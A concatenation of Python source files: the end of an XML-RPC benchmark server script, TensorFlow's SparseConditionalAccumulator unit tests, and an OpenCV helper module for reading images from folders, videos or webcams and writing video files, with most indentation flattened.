    server_thread = threading.Thread(target=runserv, args=(port,))
    server_thread.setDaemon(True) # Allow process to finish if this is the only remaining thread
    server_thread.start()
    server_thread.join()
if __name__ == "__main__":
_main()
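# A minimal client-side sketch (assumption: a server started by this script is reachable
# on this host at the default port 8000); not part of the original file. The request is a
# list with a single dictionary whose keys mirror the _DEFAULTS keywords that
# request_benchmark() understands.
#
#   import xmlrpclib, socket
#   proxy = xmlrpclib.ServerProxy("http://%s:%s" % (socket.gethostname(), 8000))
#   results = proxy.request_benchmark([{"TimeSizeEvents": 10,
#                                       "TimeSizeCandles": "MinBias",
#                                       "cpus": "1"}])
#   print results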
|
sparse_conditional_accumulator_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
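# Helper below: converts a dense numpy array into an ops.IndexedSlices value, keeping only
# the rows whose entries sum to a nonzero value (those row indices become `indices`, the
# rows themselves become `values`).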
def _indexedslice(x, noshape=False):
x = np.array(x)
dense_shape = x.shape
ndim = len(dense_shape)
indices = np.where(np.sum(x, tuple(range(1, ndim))))[0]
values = x[indices]
if noshape:
dense_shape = None
return ops.IndexedSlices(
indices=indices.tolist(), values=values, dense_shape=dense_shape)
class IndexedSlicesConditionalAccumulatorTest(test.TestCase):
def _assertEqual_indexedslices(self, expected_tensor, result):
self.assertAllEqual(expected_tensor.indices, result.indices)
self.assertAllEqual(expected_tensor.values, result.values)
if (result.dense_shape is not None and
expected_tensor.dense_shape is not None):
self.assertAllEqual(expected_tensor.dense_shape, result.dense_shape)
def _assertEqual_nparray(self, expected_array, result, sess):
expected_tensor = _indexedslice(expected_array)
self._assertEqual_indexedslices(expected_tensor, result)
def testConstructor(self):
with ops.Graph().as_default():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q")
self.assertTrue(isinstance(q.accumulator_ref, ops.Tensor))
self.assertProtoEquals(
"""
name:'Q' op:'SparseConditionalAccumulator'
attr { key: 'dtype' value { type: DT_FLOAT } }
attr { key: 'shape' value { shape { unknown_rank: true} } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
attr { key: 'reduction_type' value {s: 'MEAN'} }
""", q.accumulator_ref.op.node_def)
def testConstructorWithInvalidArg(self):
with ops.Graph().as_default():
with self.assertRaises(ValueError):
data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", reduction_type="Invalid")
def testConstructorWithShape(self):
with ops.Graph().as_default():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32,
name="Q",
shape=tensor_shape.TensorShape([1, 5, 2, 8]))
self.assertTrue(isinstance(q.accumulator_ref, ops.Tensor))
self.assertProtoEquals(
"""
name:'Q' op:'SparseConditionalAccumulator'
attr { key: 'dtype' value { type: DT_FLOAT } }
attr { key: 'shape' value { shape { dim {size: 1 }
dim {size: 5 }
dim {size: 2 }
dim {size: 8 }
} } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
attr { key: 'reduction_type' value {s: 'MEAN'} }
""", q.accumulator_ref.op.node_def)
@test_util.run_deprecated_v1
def testAccumulatorSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q")
self.assertEqual(q.num_accumulated().eval(), 0)
@test_util.run_deprecated_v1
def testAccumulatorSetGlobalStep(self):
with self.cached_session():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
set_global_step_op = q.set_global_step(1)
set_global_step_op.run()
@test_util.run_deprecated_v1
def testAccumulatorApplyGradFloat32(self):
with self.cached_session():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([3, 3]))
accum_op = q.apply_indexed_slices_grad(
ops.IndexedSlices(
indices=[0, 2],
values=np.array([[0, 0, 1], [3, 0, 4]]).astype(np.float32)))
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 1)
@test_util.run_deprecated_v1
def testDtypes(self):
with self.cached_session() as sess:
dtypes = [dtypes_lib.float16, dtypes_lib.float32, dtypes_lib.float64]
for i in range(len(dtypes)):
dtype = dtypes[i]
q = data_flow_ops.SparseConditionalAccumulator(
dtype, shape=tensor_shape.TensorShape([3, 3, 3]))
elems = np.arange(2)
sum_elems = np.zeros([3, 3, 3]).astype(dtype.as_numpy_dtype)
for e in elems:
mat_to_add = np.zeros([3, 3, 3]).astype(dtype.as_numpy_dtype)
mat_to_add[i, i, i] = e + 1
sum_elems += mat_to_add
t = _indexedslice(mat_to_add)
q.apply_indexed_slices_grad(t).run()
result = self.evaluate(q.take_indexed_slices_grad(1))
self._assertEqual_nparray(sum_elems / len(elems), result, sess)
@test_util.run_deprecated_v1
def testAccumulatorMultipleAccumulators(self):
with self.cached_session() as sess:
q_f32_0 = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([2, 2]))
q_f32_1 = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([2, 2]))
q_f16_0 = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float16, name="Q", shape=tensor_shape.TensorShape([2, 2]))
q_f16_1 = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float16, name="Q", shape=tensor_shape.TensorShape([2, 2]))
accums = [q_f16_0, q_f16_1, q_f32_0, q_f32_1]
elems = [[[1, 0], [0, 0]], [[0, 1], [0, 0]], [[0, 0], [1, 0]], [[0, 0],
[0, 1]]]
expected_tensors = []
for i in range(len(accums)):
tensor_to_add = np.array(elems[i]).astype(accums[i]
.dtype.as_numpy_dtype)
expected_tensor = _indexedslice(tensor_to_add)
expected_tensors.append(expected_tensor)
st = _indexedslice(tensor_to_add)
accums[i].apply_indexed_slices_grad(st).run()
for i in range(len(accums)):
result = sess.run(accums[i].take_indexed_slices_grad(1))
self._assertEqual_indexedslices(expected_tensors[i], result)
@test_util.run_deprecated_v1
def testAccumulatorTakeGradMean(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=())
grad_indexed_slices = ops.IndexedSlices(
indices=[0, 1], values=np.array([[1, 0], [0, 2]]).astype(np.float32))
accum_op = q.apply_indexed_slices_grad(grad_indexed_slices)
accum_op.run()
accum_op = q.apply_grad([0, 2],
np.array([[0, 1], [3, 0]]).astype(np.float32),
[3, 2])
accum_op.run()
takeg_t = q.take_indexed_slices_grad(1)
val = self.evaluate(takeg_t)
self.assertAllEqual([0, 1, 2], val.indices)
self.assertAllEqual([[0.5, 0.5], [0, 2], [3, 0]], val.values)
self.assertAllEqual([-1, 2], val.dense_shape)
@test_util.run_deprecated_v1
def testAccumulatorTakeGradSum(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=(), reduction_type="SUM")
grad_indexed_slices = ops.IndexedSlices(
indices=[0, 1], values=np.array([[1, 0], [0, 2]]).astype(np.float32))
accum_op = q.apply_indexed_slices_grad(grad_indexed_slices)
accum_op.run()
accum_op = q.apply_grad([0, 2],
np.array([[0, 1], [3, 0]]).astype(np.float32),
[3, 2])
accum_op.run()
takeg_t = q.take_indexed_slices_grad(1)
val = self.evaluate(takeg_t)
self.assertAllEqual([0, 1, 2], val.indices)
self.assertAllEqual([[1, 1], [0, 2], [3, 0]], val.values)
self.assertAllEqual([-1, 2], val.dense_shape)
@test_util.run_deprecated_v1
def testAccumulatorTakeGradInvalidReductionType(self):
with self.assertRaises(ValueError):
data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=(), reduction_type="Invalid")
@test_util.run_deprecated_v1
def testAccumulatorRepeatedTakeGrad(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=())
grad_indexed_slices = ops.IndexedSlices(
indices=[0, 1], values=np.array([[1, 0], [0, 2]]).astype(np.float32))
accum_op = q.apply_indexed_slices_grad(grad_indexed_slices, local_step=0)
accum_op.run()
accum_op = q.apply_grad(
[0, 2],
np.array([[0, 1], [3, 0]]).astype(np.float32), [3, 2],
local_step=0)
accum_op.run()
takeg_t = q.take_indexed_slices_grad(1)
val = self.evaluate(takeg_t)
self.assertAllEqual(val.indices, [0, 1, 2])
self.assertAllEqual(val.values, [[0.5, 0.5], [0, 2], [3, 0]])
self.assertAllEqual(val.dense_shape, [-1, 2])
grad_indexed_slices = ops.IndexedSlices(
indices=[0, 1],
values=np.array([[10, 0], [0, 20]]).astype(np.float32))
accum_op = q.apply_indexed_slices_grad(grad_indexed_slices, local_step=1)
accum_op.run()
accum_op = q.apply_grad(
[0, 2],
np.array([[0, 10], [30, 0]]).astype(np.float32), [3, 2],
local_step=1)
accum_op.run()
takeg_t = q.take_indexed_slices_grad(1)
val = self.evaluate(takeg_t)
self.assertAllEqual(val.indices, [0, 1, 2])
self.assertAllEqual(val.values, [[5, 5], [0, 20], [30, 0]])
self.assertAllEqual(val.dense_shape, [-1, 2])
@test_util.run_v1_only("b/120545219")
def testParallelApplyGradMean(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([2, 2]))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
accum_ops = []
for x in elems:
x = _indexedslice(np.array([[x, 0], [0, x]]).astype(np.float32))
accum_ops.append(q.apply_indexed_slices_grad(x, local_step=0))
takeg_t = q.take_indexed_slices_grad(1)
def apply_indexed_slices_grad(accum_op):
self.evaluate(accum_op)
threads = [
self.checkedThread(
target=apply_indexed_slices_grad, args=(o,)) for o in accum_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
val = self.evaluate(takeg_t)
expected_val = sum(elems) / len(elems)
self._assertEqual_nparray(
np.array([[expected_val, 0], [0, expected_val]]).astype(np.float32),
val, sess)
@test_util.run_v1_only("b/120545219")
def testParallelApplyGradSum(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32,
name="Q",
shape=tensor_shape.TensorShape([2, 2]),
reduction_type="SUM")
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
accum_ops = []
for x in elems:
x = _indexedslice(np.array([[x, 0], [0, x]]).astype(np.float32))
accum_ops.append(q.apply_indexed_slices_grad(x, local_step=0))
takeg_t = q.take_indexed_slices_grad(1)
def apply_indexed_slices_grad(accum_op):
self.evaluate(accum_op)
threads = [
self.checkedThread(target=apply_indexed_slices_grad, args=(o,))
for o in accum_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
val = self.evaluate(takeg_t)
expected_val = 550.0
self._assertEqual_nparray(
np.array([[expected_val, 0], [0, expected_val]]).astype(np.float32),
val, sess)
@test_util.run_v1_only("b/120545219")
def testParallelTakeGrad(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([2, 2]))
elems = [e + 1 for e in range(10)]
accum_ops = []
for e in elems:
v = _indexedslice(np.array([[0, 0], [e, 0]]).astype(np.float32))
accum_ops.append(q.apply_indexed_slices_grad(v, local_step=e - 1))
takeg_t = q.take_indexed_slices_grad(1)
results = []
def apply_indexed_slices_grad():
for accum_op in accum_ops:
time.sleep(1.0)
self.evaluate(accum_op)
apply_indexed_slices_grad_thread = self.checkedThread(
target=apply_indexed_slices_grad)
def take_grad():
t = self.evaluate(takeg_t)
results.append(t)
threads = [self.checkedThread(target=take_grad) for _ in range(10)]
for thread in threads:
thread.start()
apply_indexed_slices_grad_thread.start()
for thread in threads:
thread.join()
apply_indexed_slices_grad_thread.join()
for i in range(len(accum_ops)):
self._assertEqual_nparray(
np.array([[0, 0], [elems[i], 0]]), results[i], sess)
@test_util.run_v1_only("b/120545219")
def testAccumulatorApplyAndBlockingTake(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([2, 2]))
elems = [10.0, 20.0, 30.0]
elems_ave = sum(elems) / len(elems)
accum_ops = []
for x in elems:
x = _indexedslice(np.array([[0, x], [0, 0]]).astype(np.float32))
accum_ops.append(q.apply_indexed_slices_grad(x, local_step=0))
takeg_t = q.take_indexed_slices_grad(3)
results = []
def apply_indexed_slices_grad():
for accum_op in accum_ops:
self.evaluate(accum_op)
def take_grad():
results.append(self.evaluate(takeg_t))
accum_thread = self.checkedThread(target=apply_indexed_slices_grad)
takeg_thread = self.checkedThread(target=take_grad)
accum_thread.start()
takeg_thread.start()
accum_thread.join()
takeg_thread.join()
self._assertEqual_nparray([[0, elems_ave], [0, 0]], results[0], sess)
def _blocking_takeg(self, sess, takeg_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(takeg_op)
@test_util.run_v1_only("b/120545219")
def testAccumulatorCancel(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32,
name="Q",
shape=tensor_shape.TensorShape([1, 2, 3]))
takeg_t = q.take_indexed_slices_grad(1)
takeg_thread = self.checkedThread(
self._blocking_takeg, args=(sess, takeg_t))
takeg_thread.start()
time.sleep(1.0)
sess.close() # Will cancel blocked operation
takeg_thread.join()
@test_util.run_v1_only("b/120545219")
def testNonVectorIndices(self):
with self.cached_session():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([3, 3]))
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Input indices should be vector but received shape:"):
q.apply_grad(
grad_indices=[[0, 1], [1, 0]],
grad_values=np.array([1, 2]).astype(np.float32)).run()
@test_util.run_v1_only("b/120545219")
def testZeroDimensionValues(self):
with self.cached_session():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([3, 3]))
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Values cannot be 0-dimensional."):
q.apply_grad(
grad_indices=[0], grad_values=np.array(1).astype(np.float32)).run()
@test_util.run_v1_only("b/120545219")
def testWrongNonEmptyInputValues(self):
with self.cached_session():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([3, 3]))
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
" non-empty input values, got "):
q.apply_grad(
grad_indices=[0, 1],
grad_values=np.array([[0, 1, 1]]).astype(np.float32)).run()
@test_util.run_v1_only("b/120545219")
def testDynamicNonVectorIndices(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([3, 3]))
x_indices = array_ops.placeholder(dtypes_lib.int64)
x_values = array_ops.placeholder(dtypes_lib.float32)
accum_op = q.apply_grad(grad_indices=x_indices, grad_values=x_values)
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Input indices should be vector but received shape:"):
sess.run(accum_op,
feed_dict={
x_indices: [[0, 1], [1, 0]],
x_values: np.array([1, 2]).astype(np.float32)
})
@test_util.run_v1_only("b/120545219")
def testDynamicWrongNonEmptyInputValues(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([3, 3]))
x_indices = array_ops.placeholder(dtypes_lib.int64)
x_values = array_ops.placeholder(dtypes_lib.float32)
accum_op = q.apply_grad(grad_indices=x_indices, grad_values=x_values)
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
" non-empty input values, got "):
sess.run(accum_op,
feed_dict={
x_indices: [0, 1],
x_values: np.array([[0, 1, 1]]).astype(np.float32)
})
@test_util.run_v1_only("b/120545219")
def testEmptyShapeApply(self):
with self.cached_session():
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([]))
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Input indices should be vector"):
q.apply_grad(grad_indices=0, grad_values=[1.0], grad_shape=[]).run()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Input indices should be vector"):
q.apply_grad(grad_indices=0, grad_values=[1.0]).run()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Values cannot be 0-dimensional."):
q.apply_grad(grad_indices=[0], grad_values=1.0, grad_shape=[]).run()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Values cannot be 0-dimensional."):
q.apply_grad(grad_indices=[0], grad_values=1.0).run()
# The right way to apply a scalar
q.apply_grad(grad_indices=[0], grad_values=[1.0], grad_shape=[]).run()
q.apply_grad(grad_indices=[0], grad_values=[1.0]).run()
@test_util.run_v1_only("b/120545219")
def testValidateShape(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=[2, 2, None])
# Provided shape has wrong rank
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: expected shape rank at least 3, got 2"):
q.apply_grad(
grad_indices=[0],
grad_values=np.array([[1, 2]]).astype(np.float32),
grad_shape=[2, 2]).run()
# Provided shape has wrong dim
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: expected shape dim 1 to be 2, got 3"):
q.apply_grad(
grad_indices=[0],
grad_values=np.array([[[1, 2], [3, 4], [5, 6]]]).astype(np.float32),
grad_shape=[2, 3, 2]).run()
# Indices exceeded accumulator's shape's limits
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: index of slice 0 exceeded limits of shape;"
" index is 3 exceeded 2"):
q.apply_grad(
grad_indices=[3],
grad_values=np.array([[[1, 2], [3, 4]]]).astype(np.float32)).run()
# Values' rank does not match shape
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: expected values rank at least 3, got 2"):
q.apply_grad(
grad_indices=[0, 1],
grad_values=np.array([[1, 2], [3, 4]]).astype(np.float32)).run()
# Values' dim does not match shape
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: expected values dim 1 to be 2, got 3"):
q.apply_grad(
grad_indices=[0],
grad_values=np.array(
[[[1, 2], [3, 4], [5, 6]]]).astype(np.float32)).run()
# First successful gradient creates additional constraints
# Shape will additionally be constrained to [None, 2, 2, 2] hereafter.
q.apply_grad(
grad_indices=[0],
grad_values=np.array(
[[[[1, 2], [3, 4]], [[5, 6], [7, 8]]]]).astype(np.float32)).run()
# Values' rank does not match accumulated gradient
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: expected values rank 4, got 3"):
q.apply_grad(
grad_indices=[0],
grad_values=np.array([[[1, 2], [3, 4]]]).astype(np.float32)).run()
# Values' dim does not match accumulated gradient
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: expected values dim 3 to be 2, got 3"):
q.apply_grad(
grad_indices=[0],
grad_values=np.array(
[[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]]]).astype(
np.float32)).run()
# After take grad, constraints on accumulated gradient are removed
self.evaluate(q.take_grad(1))
# First successful gradient imposes new constraints.
# Hereafter, shape will additionally be constrained to [None, 2, 2, 3].
q.apply_grad(
grad_indices=[0],
grad_values=np.array(
[[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]]]).astype(
np.float32),
local_step=1).run()
with self.assertRaisesRegexp(
errors_impl.InvalidArgumentError,
"Shape mismatch: expected values dim 3 to be 3, got 2"):
q.apply_grad(
grad_indices=[0],
grad_values=np.array(
[[[[1, 2], [3, 4]], [[5, 6], [7, 8]]]]).astype(np.float32),
local_step=1).run()
@test_util.run_deprecated_v1
def testReturnShape(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=[2, None])
q.apply_grad(
grad_indices=[0],
grad_values=np.array(
[[[[1, 2], [3, 4]], [[5, 6], [7, 8]]]]).astype(np.float32)).run()
val = self.evaluate(q.take_indexed_slices_grad(1))
self.assertAllEqual(val.dense_shape, [2, 2, 2, 2])
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=[None, 2])
q.apply_grad(
grad_indices=[0],
grad_values=np.array(
[[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]]]).astype(
np.float32)).run()
val = self.evaluate(q.take_indexed_slices_grad(1))
self.assertAllEqual(val.dense_shape, [-1, 2, 2, 3])
@test_util.run_deprecated_v1
def testApplyGradtInt32IndicesAndShape(self):
with self.cached_session() as sess:
q = data_flow_ops.SparseConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([3, 3]))
accum_op = q.apply_grad(
grad_indices=constant_op.constant(
[0, 2], dtype=dtypes_lib.int32),
grad_values=constant_op.constant(
[[0, 0, 1], [3, 0, 4]], dtype=dtypes_lib.float32),
grad_shape=constant_op.constant(
[3, 3], dtype=dtypes_lib.int32))
accum_op.run()
accum_op = q.apply_indexed_slices_grad(
ops.IndexedSlices(
indices=constant_op.constant(
[0, 2], dtype=dtypes_lib.int32),
values=constant_op.constant(
[[0, 0, 1], [3, 0, 4]], dtype=dtypes_lib.float32),
dense_shape=constant_op.constant(
[3, 3], dtype=dtypes_lib.int32)))
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 2)
val = self.evaluate(q.take_indexed_slices_grad(1))
self.assertAllEqual(val.indices, [0, 2])
self.assertAllEqual(val.values, [[0, 0, 1], [3, 0, 4]])
self.assertAllEqual(val.dense_shape, [3, 3])
if __name__ == "__main__":
test.main()
|
lib_images_io.py
|
#!/usr/bin/env python
'''
Classes for reading images from video, folder, or web camera,
and for writing images to video file.
Main classes and functions:
* Read:
class ReadFromFolder
class ReadFromVideo
class ReadFromWebcam
* Write:
class VideoWriter
* Display:
class ImageDisplayer
* Test:
def test_ReadFromWebcam
'''
import os
import warnings
import numpy as np
import cv2
import time
import glob
import threading
import queue
import multiprocessing
class ReadFromFolder(object):
''' An image reader class for reading images from a folder.
By default, every file under the folder is treated as an image file.
'''
def __init__(self, folder_path):
self.filenames = sorted(glob.glob(folder_path + "/*"))
self.cnt_imgs = 0
self.cur_filename = ""
def read_image(self):
if self.cnt_imgs >= len(self.filenames):
return None
self.cur_filename = self.filenames[self.cnt_imgs]
img = cv2.imread(self.cur_filename, cv2.IMREAD_UNCHANGED)
self.cnt_imgs += 1
return img
def __len__(self):
return len(self.filenames)
def has_image(self):
return self.cnt_imgs < len(self.filenames)
def stop(self):
    pass
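# --- Editor's usage sketch (not part of the original module) ---------------
# A minimal, hedged example of reading every image in a folder and showing it
# with ImageDisplayer (defined later in this file). The folder path is a
# placeholder, not a path from the original project.
def _example_read_from_folder(folder_path="./images"):
    reader = ReadFromFolder(folder_path)
    displayer = ImageDisplayer()
    while reader.has_image():
        img = reader.read_image()
        if img is None:
            break
        displayer.display(img, wait_key_ms=30)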
class ReadFromVideo(object):
def __init__(self, video_path, sample_interval=1):
''' A video reader class for reading frames from a video file.
Arguments:
    video_path {str}: path of the video file.
    sample_interval {int}: read every k-th frame.
'''
if not os.path.exists(video_path):
raise IOError("Video not exist: " + video_path)
assert isinstance(sample_interval, int) and sample_interval >= 1
self.cnt_imgs = 0
self._is_stoped = False
self._video = cv2.VideoCapture(video_path)
ret, image = self._video.read()
self._next_image = image
self._sample_interval = sample_interval
self._fps = self.get_fps()
if self._fps < 0.0001:
    # warnings is already imported at module level
    warnings.warn("Invalid fps of video: {}".format(video_path))
def has_image(self):
return self._next_image is not None
def get_curr_video_time(self):
return 1.0 / self._fps * self.cnt_imgs
def read_image(self):
image = self._next_image
for i in range(self._sample_interval):
if self._video.isOpened():
ret, frame = self._video.read()
self._next_image = frame
else:
self._next_image = None
break
self.cnt_imgs += 1
return image
def stop(self):
self._video.release()
self._is_stoped = True
def __del__(self):
if not self._is_stoped:
self.stop()
def get_fps(self):
# Find OpenCV version
(major_ver, minor_ver, subminor_ver) = (cv2.__version__).split('.')
# With webcam get(CV_CAP_PROP_FPS) does not work.
# Let's see for ourselves.
# Get video properties
if int(major_ver) < 3:
fps = self._video.get(cv2.cv.CV_CAP_PROP_FPS)
else:
fps = self._video.get(cv2.CAP_PROP_FPS)
return fps
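# --- Editor's usage sketch (not part of the original module) ---------------
# Hedged example: play back every 3rd frame of a video file and print the
# current video time. The input path is a placeholder.
def _example_play_video(video_path="input.avi"):
    reader = ReadFromVideo(video_path, sample_interval=3)
    displayer = ImageDisplayer()
    while reader.has_image():
        frame = reader.read_image()
        if frame is None:
            break
        print("t = {:.2f}s".format(reader.get_curr_video_time()))
        displayer.display(frame, wait_key_ms=30)
    reader.stop()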
class ReadFromWebcam(object):
def __init__(self, max_framerate=30.0, webcam_idx=0):
''' Read images from a web camera.
Arguments:
    max_framerate {float}: the actual framerate is throttled so that it does not exceed this value.
    webcam_idx {int}: index of the web camera; usually 0 for the built-in camera.
'''
# Settings
self._max_framerate = max_framerate
queue_size = 3
# Initialize video reader
self._video = cv2.VideoCapture(webcam_idx)
self._is_stoped = False
# Use a thread to keep on reading images from web camera
self._imgs_queue = queue.Queue(maxsize=queue_size)
self._is_thread_alive = multiprocessing.Value('i', 1)
self._thread = threading.Thread(
target=self._thread_reading_webcam_images)
self._thread.start()
# Manually control the framerate of the webcam by sleeping
self._min_dt = 1.0 / self._max_framerate
self._prev_t = time.time() - 1.0 / max_framerate
def read_image(self):
dt = time.time() - self._prev_t
if dt <= self._min_dt:
time.sleep(self._min_dt - dt)
self._prev_t = time.time()
image = self._imgs_queue.get(timeout=10.0)
return image
def has_image(self):
return True  # The web camera always has a new image
def stop(self):
self._is_thread_alive.value = False
self._video.release()
self._is_stoped = True
def __del__(self):
if not self._is_stoped:
self.stop()
def _thread_reading_webcam_images(self):
while self._is_thread_alive.value:
ret, image = self._video.read()
if self._imgs_queue.full(): # if queue is full, pop one
img_to_discard = self._imgs_queue.get(timeout=0.001)
self._imgs_queue.put(image, timeout=0.001) # push to queue
print("Web camera thread is dead.")
class VideoWriter(object):
def __init__(self, video_path, framerate):
# -- Settings
self._video_path = video_path
self._framerate = framerate
# -- Variables
self._cnt_img = 0
# initialize later when the 1st image comes
self._video_writer = None
self._width = None
self._height = None
# -- Create output folder
folder = os.path.dirname(video_path)
if not os.path.exists(folder):
os.makedirs(folder)
def write(self, img):
self._cnt_img += 1
if self._cnt_img == 1: # initialize the video writer
#fourcc = cv2.VideoWriter_fourcc(*'XVID') # define the codec
#fourcc = cv2.VideoWriter_fourcc('M','J','P','G') #above code not always working in windows
fourcc = cv2.VideoWriter_fourcc(*'mp4v')
#fourcc = cv2.VideoWriter_fourcc(*'VP90')
#fourcc = cv2.VideoWriter_fourcc(*'H264')
#fourcc = cv2.VideoWriter_fourcc(*'MPEG')
self._width = img.shape[1]
self._height = img.shape[0]
self._video_writer = cv2.VideoWriter(
self._video_path, fourcc, self._framerate, (self._width, self._height))
self._video_writer.write(img)
def stop(self):
self.__del__()
def __del__(self):
if self._cnt_img > 0:
self._video_writer.release()
print("Complete writing {}fps and {}s video to {}".format(
self._framerate, self._cnt_img/self._framerate, self._video_path))
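# --- Editor's usage sketch (not part of the original module) ---------------
# Hedged example: grab roughly `seconds` seconds from the default webcam at
# `fps` frames per second and save them as an mp4. The output path is a
# placeholder.
def _example_record_webcam(dst="output/webcam.mp4", fps=10.0, seconds=5):
    reader = ReadFromWebcam(max_framerate=fps, webcam_idx=0)
    writer = VideoWriter(dst, framerate=fps)
    for _ in range(int(fps * seconds)):
        frame = reader.read_image()
        if frame is None:
            break
        writer.write(frame)
    reader.stop()
    writer.stop()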
class ImageDisplayer(object):
''' A simple wrapper of using cv2.imshow to display image '''
def __init__(self):
self._window_name = "cv2_display_window"
cv2.namedWindow(self._window_name, cv2.WINDOW_NORMAL)
def display(self, image, wait_key_ms=1):
cv2.imshow(self._window_name, image)
cv2.waitKey(wait_key_ms)
def __del__(self):
cv2.destroyWindow(self._window_name)
def test_ReadFromWebcam():
''' Test the class ReadFromWebcam '''
webcam_reader = ReadFromWebcam(max_framerate=10)
img_displayer = ImageDisplayer()
import itertools
for i in itertools.count():
img = webcam_reader.read_image()
if img is None:
break
